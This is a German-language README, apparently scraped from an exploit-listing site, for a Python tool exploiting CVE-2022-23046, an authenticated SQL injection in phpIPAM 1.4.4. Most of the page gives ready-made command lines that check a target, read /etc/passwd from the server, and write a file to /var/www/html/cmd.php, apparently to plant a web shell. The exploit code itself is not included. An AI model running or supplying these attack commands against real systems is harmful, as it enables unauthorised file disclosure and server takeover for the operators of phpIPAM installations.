## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HADRIAN3689-PHPIPAM_1.4.4
# CVE-2022-23046 phpIPAM 1.4.4 - SQL Injection
phpIPAM v1.4.4 erlaubt es einem authentifizierten Admin-Benutzer, SQL-Befehle in den Subnet-Parameter einzuschleusen, während über app/admin/routing/edit-bgp-mapping-search.php nach einem Subnet gesucht wird. Dieses Projekt gibt derzeit Datenbankinformationen und Host-Versionsinformationen aus. Es kann auch versuchen, Dateien zu lesen und auf dem Server zu schreiben.
## Erste Schritte
### Programm ausführen
* Um zu prüfen, ob es anfällig ist.
root@kitploit:~
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password
* Zum Testen des Dateilesens
root@kitploit:~
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -f /etc/passwd
* Zum Testen des Dateischreibens
root@kitploit:~
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -w /var/www/html/cmd.php
## Hilfe